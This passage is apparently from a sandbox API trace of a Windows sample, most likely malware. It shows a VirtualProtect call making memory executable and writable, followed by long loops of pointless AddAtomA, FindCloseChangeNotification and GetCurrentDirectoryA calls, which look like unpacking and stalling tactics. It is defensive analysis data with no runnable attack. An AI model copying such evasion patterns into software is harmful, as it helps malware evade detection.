GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.577] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.577] GetACP () returned 0x4e4 [0178.577] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.577] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.577] GetACP () returned 0x4e4 [0178.577] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.577] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.577] GetACP () returned 0x4e4 [0178.577] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.578] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.578] GetACP () returned 0x4e4 [0178.578] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.578] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.578] GetACP () returned 0x4e4 [0179.658] VirtualProtect (in: lpAddress=0x8a5ab8, dwSize=0xf540, flNewProtect=0x40, lpflOldProtect=0x43b444 | out: lpflOldProtect=0x43b444*=0x4) returned 1 [0179.658] AddAtomA (lpString=0x0) returned 0x0 [0179.658] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.658] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.659] AddAtomA (lpString=0x0) returned 0x0 [0179.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.659] AddAtomA (lpString=0x0) returned 0x0 [0179.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.659] AddAtomA (lpString=0x0) returned 0x0 [0179.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.659] AddAtomA (lpString=0x0) returned 0x0 [0179.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.659] AddAtomA (lpString=0x0) returned 0x0 [0179.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.659] AddAtomA (lpString=0x0) returned 0x0 [0179.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.659] AddAtomA (lpString=0x0) returned 0x0 [0179.659] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.659] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.660] AddAtomA (lpString=0x0) returned 0x0 [0179.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.660] AddAtomA (lpString=0x0) returned 0x0 [0179.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.660] AddAtomA (lpString=0x0) returned 0x0 [0179.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.660] AddAtomA (lpString=0x0) returned 0x0 [0179.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.660] AddAtomA (lpString=0x0) returned 0x0 [0179.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.660] AddAtomA (lpString=0x0) returned 0x0 [0179.660] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.660] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.660] AddAtomA (lpString=0x0) returned 0x0 [0179.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.661] AddAtomA (lpString=0x0) returned 0x0 [0179.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.661] AddAtomA (lpString=0x0) returned 0x0 [0179.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.661] AddAtomA (lpString=0x0) returned 0x0 [0179.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.661] AddAtomA (lpString=0x0) returned 0x0 [0179.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.661] AddAtomA (lpString=0x0) returned 0x0 [0179.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.661] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.661] AddAtomA (lpString=0x0) returned 0x0 [0179.661] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.662] AddAtomA (lpString=0x0) returned 0x0 [0179.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.662] AddAtomA (lpString=0x0) returned 0x0 [0179.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.662] AddAtomA (lpString=0x0) returned 0x0 [0179.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.662] AddAtomA (lpString=0x0) returned 0x0 [0179.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.662] AddAtomA (lpString=0x0) returned 0x0 [0179.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.662] AddAtomA (lpString=0x0) returned 0x0 [0179.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.662] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.662] AddAtomA (lpString=0x0) returned 0x0 [0179.662] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.663] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.663] AddAtomA (lpString=0x0) returned 0x0 [0179.663] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.663] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.663] AddAtomA (lpString=0x0) returned 0x0 [0179.663] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.663] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.663] AddAtomA (lpString=0x0) returned 0x0 [0179.663] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.663] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.663] AddAtomA (lpString=0x0) returned 0x0 [0179.663] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.663] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.663] AddAtomA (lpString=0x0) returned 0x0 [0179.663] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.663] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.663] AddAtomA (lpString=0x0) returned 0x0 [0179.663] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.664] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.664] AddAtomA (lpString=0x0) returned 0x0 [0179.664] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.664] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.664] AddAtomA (lpString=0x0) returned 0x0 [0179.664] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.664] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.664] AddAtomA (lpString=0x0) returned 0x0 [0179.664] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.664] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.664] AddAtomA (lpString=0x0) returned 0x0 [0179.664] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.664] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.664] AddAtomA (lpString=0x0) returned 0x0 [0179.664] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.664] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.664] AddAtomA (lpString=0x0) returned 0x0 [0179.664] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.664] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.664] AddAtomA (lpString=0x0) returned 0x0 [0179.664] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.664] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.665] AddAtomA (lpString=0x0) returned 0x0 [0179.665] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.665] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.665] AddAtomA (lpString=0x0) returned 0x0 [0179.665] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.665] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.665] AddAtomA (lpString=0x0) returned 0x0 [0179.665] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.665] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.665] AddAtomA (lpString=0x0) returned 0x0 [0179.665] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.665] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.665] AddAtomA (lpString=0x0) returned 0x0 [0179.665] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.665] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.665] AddAtomA (lpString=0x0) returned 0x0 [0179.665] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.665] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.665] AddAtomA (lpString=0x0) returned 0x0 [0179.665] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.665] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.665] AddAtomA (lpString=0x0) returned 0x0 [0179.665] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.666] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.666] AddAtomA (lpString=0x0) returned 0x0 [0179.666] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.666] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.666] AddAtomA (lpString=0x0) returned 0x0 [0179.666] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.666] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.666] AddAtomA (lpString=0x0) returned 0x0 [0179.666] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.666] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.666] AddAtomA (lpString=0x0) returned 0x0 [0179.666] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.666] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.666] AddAtomA (lpString=0x0) returned 0x0 [0179.666] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.666] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.666] AddAtomA (lpString=0x0) returned 0x0 [0179.666] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.666] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.666] AddAtomA (lpString=0x0) returned 0x0 [0179.666] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.666] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.667] AddAtomA (lpString=0x0) returned 0x0 [0179.667] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.667] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.667] AddAtomA (lpString=0x0) returned 0x0 [0179.667] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.667] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.667] AddAtomA (lpString=0x0) returned 0x0 [0179.667] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.667] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.667] AddAtomA (lpString=0x0) returned 0x0 [0179.667] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.667] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.667] AddAtomA (lpString=0x0) returned 0x0 [0179.667] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.667] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.667] AddAtomA (lpString=0x0) returned 0x0 [0179.667] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.667] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.667] AddAtomA (lpString=0x0) returned 0x0 [0179.667] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.667] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.668] AddAtomA (lpString=0x0) returned 0x0 [0179.668] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.668] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.668] AddAtomA (lpString=0x0) returned 0x0 [0179.668] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.668] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.668] AddAtomA (lpString=0x0) returned 0x0 [0179.668] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.668] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.668] AddAtomA (lpString=0x0) returned 0x0 [0179.668] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.668] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.668] AddAtomA (lpString=0x0) returned 0x0 [0179.668] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.668] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.668] AddAtomA (lpString=0x0) returned 0x0 [0179.668] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.668] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.668] AddAtomA (lpString=0x0) returned 0x0 [0179.669] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.669] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.669] AddAtomA (lpString=0x0) returned 0x0 [0179.669] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.669] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.669] AddAtomA (lpString=0x0) returned 0x0 [0179.669] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.669] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.669] AddAtomA (lpString=0x0) returned 0x0 [0179.669] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.669] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.669] AddAtomA (lpString=0x0) returned 0x0 [0179.669] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.669] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.669] AddAtomA (lpString=0x0) returned 0x0 [0179.669] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.669] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.669] AddAtomA (lpString=0x0) returned 0x0 [0179.669] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.669] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.669] AddAtomA (lpString=0x0) returned 0x0 [0179.669] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.670] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.670] AddAtomA (lpString=0x0) returned 0x0 [0179.670] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.670] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.670] AddAtomA (lpString=0x0) returned 0x0 [0179.670] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.670] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.670] AddAtomA (lpString=0x0) returned 0x0 [0179.670] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.670] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.670] AddAtomA (lpString=0x0) returned 0x0 [0179.670] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.670] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.670] AddAtomA (lpString=0x0) returned 0x0 [0179.670] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.670] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.670] AddAtomA (lpString=0x0) returned 0x0 [0179.670] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.670] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.670] AddAtomA (lpString=0x0) returned 0x0 [0179.670] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.670] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.670] AddAtomA (lpString=0x0) returned 0x0 [0179.671] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.671] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.671] AddAtomA (lpString=0x0) returned 0x0 [0179.671] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.671] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.671] AddAtomA (lpString=0x0) returned 0x0 [0179.671] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.671] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.671] AddAtomA (lpString=0x0) returned 0x0 [0179.671] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.671] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.671] AddAtomA (lpString=0x0) returned 0x0 [0179.671] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.671] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.671] AddAtomA (lpString=0x0) returned 0x0 [0179.671] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.671] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.671] AddAtomA (lpString=0x0) returned 0x0 [0179.671] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.671] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.671] AddAtomA (lpString=0x0) returned 0x0 [0179.671] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.672] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.672] AddAtomA (lpString=0x0) returned 0x0 [0179.672] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.672] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.672] AddAtomA (lpString=0x0) returned 0x0 [0179.672] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.672] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.672] AddAtomA (lpString=0x0) returned 0x0 [0179.672] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.672] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.672] AddAtomA (lpString=0x0) returned 0x0 [0179.672] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.672] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.672] AddAtomA (lpString=0x0) returned 0x0 [0179.672] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.672] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.672] AddAtomA (lpString=0x0) returned 0x0 [0179.672] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.672] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.672] AddAtomA (lpString=0x0) returned 0x0 [0179.672] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.673] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.673] AddAtomA (lpString=0x0) returned 0x0 [0179.673] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.673] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.673] AddAtomA (lpString=0x0) returned 0x0 [0179.673] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.673] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.673] AddAtomA (lpString=0x0) returned 0x0 [0179.673] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.673] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.673] AddAtomA (lpString=0x0) returned 0x0 [0179.673] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.673] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0179.673] AddAtomA (lpString=0x0) returned 0x0 [0179.673] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0179.673] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: 